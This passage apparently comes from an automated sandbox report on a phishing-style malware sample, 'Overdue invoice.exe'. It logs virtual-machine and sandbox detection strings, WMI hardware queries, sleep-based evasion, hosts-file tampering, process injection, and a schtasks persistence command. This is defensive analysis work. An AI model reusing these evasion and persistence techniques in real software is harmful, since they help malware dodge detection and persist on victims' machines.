                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 4264Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276Thread sleep count: 4378 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276Thread sleep count: 4299 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7128Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020Thread sleep count: 3465 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020Thread sleep count: 5329 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWindow / User API: threadDelayed 4378Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWindow / User API: threadDelayed 4299Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWindow / User API: threadDelayed 3465
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWindow / User API: threadDelayed 5329
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477
                    Source: yqWDN.exe, 0000000F.00000002.371657286.0000000000E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: Overdue invoice.exe, 00000007.00000002.521324973.0000000001715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Overdue invoice.exeMemory written: C:\Users\user\Desktop\Overdue invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeMemory written: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
